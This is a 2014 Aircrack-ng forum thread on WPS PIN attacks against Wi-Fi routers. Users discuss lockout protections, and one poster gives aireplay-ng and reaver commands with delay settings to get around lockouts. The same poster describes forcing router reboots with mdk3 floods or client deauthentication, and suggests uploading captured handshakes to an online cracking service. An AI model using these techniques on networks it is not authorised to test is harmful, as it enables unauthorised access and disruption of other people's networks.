Aircrack-ng forum

Please login or register.

Login with username, password and session length
Advanced search  

News:

Aircrack-ng 1.7 release

Author Topic: Aircrack-NG WPS attacks  (Read 30304 times)

some123

  • Newbie
  • *
  • Offline Offline
  • Posts: 4
Aircrack-NG WPS attacks
« on: January 18, 2014, 09:44:52 am »

Hey all (:

Will aircrack-ng ever 'do' WPS attacks? If not, is there a reason why?

E.g. what reaver & bully does?
https://code.google.com/p/reaver-wps/
https://github.com/bdpurcell/bully


Have a good ya'll!
Logged

misterx

  • Aircrack-ng Author
  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 1937
  • Aircrack-ng Author
    • Aircrack-ng
Re: Aircrack-NG WPS attacks
« Reply #1 on: January 18, 2014, 08:07:03 pm »

I don't know.

A while ago, the author of Reaver talked to me to integrate it into aircrack-ng so I created him a username on trac and svn but he never did anything and he never asked me any question. I might have asked him if he needed help (but not sure) and he never said anything.
Logged

some123

  • Newbie
  • *
  • Offline Offline
  • Posts: 4
Re: Aircrack-NG WPS attacks
« Reply #2 on: January 19, 2014, 02:25:08 pm »

reaver hasnt been updated since Jan 2012 - looks like the project has gone dark.

Would asking the bully guys be better (as thats currently being worked on)?
Logged

pedropt

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 73
Re: Aircrack-NG WPS attacks
« Reply #3 on: August 28, 2014, 07:39:02 pm »

WPS protections have been very upgraded by routers brands .
It is getting more and more difficult each time to crack a wps wifi router .
Sometimes it will take more than 3 months to crack a wps router because some of them block any wps access for 24h after 3 tries , and some of them even block all wps attacks until next modem/router reboot after 3 tries .
The future of wps attacking will be a mix of MDK , bully , aircrack .
Example :
If wps blocked more than 60 seconds then an mdk command must be used automatically in order to force modem reboot .
But even that will take much suspicious by the side of the owner , by watching his/her equipment go off after each 3 minutes .
Logged

open

  • Newbie
  • *
  • Offline Offline
  • Posts: 41
Re: Aircrack-NG WPS attacks
« Reply #4 on: September 01, 2014, 02:05:36 pm »

If wps blocked more than 60 seconds then an mdk command must be used automatically in order to force modem reboot .
I would be very curious to test this approach on my router.
Could you please share with us the sequence of commands (mdk,and others) to force a modem reboot?
Thank you
Logged

open

  • Newbie
  • *
  • Offline Offline
  • Posts: 41
Re: Aircrack-NG WPS attacks
« Reply #5 on: September 06, 2014, 10:29:34 am »

did a few tests.
reaver and bully are both bugged with the same bug: keep flooding the ap with association and authorization frames no matter what ap answers,which results in deauthentication.
I found some videos on youtube about using mdk3 to reset modem, and tried them on my top-edge-shining-brand-new router: wps gets locked after 5 tries, and no mdk3 can unlock or reset the router, no matter how long I keep running mdk3.
New wps routers are invulnerable, sorry 8)

p.s. found out the reaver author is selling a new version for money..........................what a waste
« Last Edit: September 06, 2014, 10:40:01 am by open »
Logged

pedropt

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 73
Re: Aircrack-NG WPS attacks
« Reply #6 on: September 14, 2014, 07:50:08 am »

Quote
I found some videos on youtube about using mdk3 to reset modem, and tried them on my top-edge-shining-brand-new router: wps gets locked after 5 tries, and no mdk3 can unlock or reset the router, no matter how long I keep running mdk3.
New wps routers are invulnerable, sorry
lol  , that depends on your signal to the AP .
if you have a -50db to -60db then yo are able to reboot it .
it is not just one command in mdk to shutdown AP , it must be used multiple attacks at same time to take effect .
It also depends on the power of you wireless card , this means .
There is also other multiple ways to reboot the ap without mdk3 , you just need to send De-autentication packets to the clients so they can not get connection stable to AP , after that the owner of the AP will think that AP is jammed and eventually will reboot the router manually .

it looks that someone did a tool for offline cracking wps .
but he will not share it .

http://arstechnica.com/security/2014/08/offline-attack-shows-wi-fi-routers-still-vulnerable/

there is also already a script that uses mdk and reaver to try to hack difficult wps protections , it is called revdk3

http://forum.top-hat-sec.com/index.php?topic=4646.0
« Last Edit: September 14, 2014, 07:58:37 am by pedropt »
Logged

tan112

  • Newbie
  • *
  • Offline Offline
  • Posts: 22
Re: Aircrack-NG WPS attacks
« Reply #7 on: September 23, 2014, 05:55:49 pm »

lol  , that depends on your signal to the AP .
you gotta be kidding! all newest ap are invulnerable to wps attacks!
only look at my WRT160Nv3, it is not even so new,but it is absolutely INVULNERABLE to any freaking mdk attacks or reaver or bully or whatever attack you can invent! I tried all ways,none worked! it even suffers from that famous "bug" which is not a bug,it is normal behavior: you dont want wps? only send few wps tries and you are done,the wps gets disabled completely,you need to reset to fabric the ap to get wps back again!not even on/off gets wps back!

Now I dare you: find me a way to crack wps or just force a reboot over any model of WRT160N.
and I will suck your d*  ;)
Logged

pedropt

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 73
Re: Aircrack-NG WPS attacks
« Reply #8 on: September 23, 2014, 06:56:52 pm »

No  please don`t .  ;)
Interesting fact your are writing .
I never got an AP that worked that way , and it is interesting the fact that User must know how to get in router configuration page to re-enable again the wps !!!
Maybe some new protections on new devices .
What mdk do is flooding the router with packets that jams the software inside and router is forced to reboot .
Catch the handshake and put it online for decoding at : http://wpa.darkircop.org/
Maybe you got some lucky and the owner did not changed the default password .
I really hope i get one of those ones one day online to test here .
I love challenges .
Logged

tan112

  • Newbie
  • *
  • Offline Offline
  • Posts: 22
Re: Aircrack-NG WPS attacks
« Reply #9 on: September 24, 2014, 06:57:11 am »

the WRT160N is mine and I did change the default password,which of course is not inside any of those stupid password collections on net!when you will find a router with such mac as 68:7F:74:x:x:x ,you will understand how hopeless and miserable is the life of those individuals who call themselves "hackers" ;)
Logged

pedropt

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 73
Re: Aircrack-NG WPS attacks
« Reply #10 on: September 24, 2014, 09:44:26 am »

ehehehehe .
Do you give me authorization to scan your ip ?
if yes then send me your ip as a PM , i want to give a look from the outside world .
you can get your ip from ip-secrets.com .
i will send you the results to a PM .
Note : The curiosity of the scan is due the fact that wireless is so protected that i will be surprised if they did an optimal firmware without backdoor opened .
« Last Edit: September 25, 2014, 07:09:35 pm by pedropt »
Logged

pedropt

  • Jr. Member
  • **
  • Offline Offline
  • Posts: 73
Re: Aircrack-NG WPS attacks
« Reply #11 on: November 09, 2014, 08:13:43 pm »

I am testing some routers with that issue .
The cause for that happen is that routers do not allow bruteforce attacks .
This particular router i am testing block wps requests after 3 attemps , then only after 60 Seconds allows more 3 tries , and then after that block wps until next reboot .
Also this particular router does not allow reaver associations .
I am be able until now to go thru with wps requests in reaver by this way :

association with aireplay :
aireplay-ng -1 20 -a xx:xx:xx:xx:xx mon0

and then with this particular command in reaver :

reaver -i mon0 -b xx:xx:xx:xx:xx -c x -A -N -E -vv -d 60

if you recieve a time out even with this delay , then you must increase the delay more .
Instead 60 , use 70 .

i also tested a router that blocked wps with same protections , but this one did not allow your mac address again .
and since you can not make an association with reaver then i need to put down mon0  change the mac address  and start everything with aireplay and reaver .

I like these challenges because we happen to learn a lot with new wps protections .
Maybe i will create a thread specifically with some techniques that can be used in wps attacks

the most important thing in the attack is a good signal to the AP , at least -65dbm
« Last Edit: November 15, 2014, 10:17:57 am by pedropt »
Logged

misterx

  • Aircrack-ng Author
  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 1937
  • Aircrack-ng Author
    • Aircrack-ng
Re: Aircrack-NG WPS attacks
« Reply #12 on: December 17, 2014, 03:12:02 am »

That would be great. Let me know when you do it, so I can make the thread sticky.
Logged
 

+ Quick Reply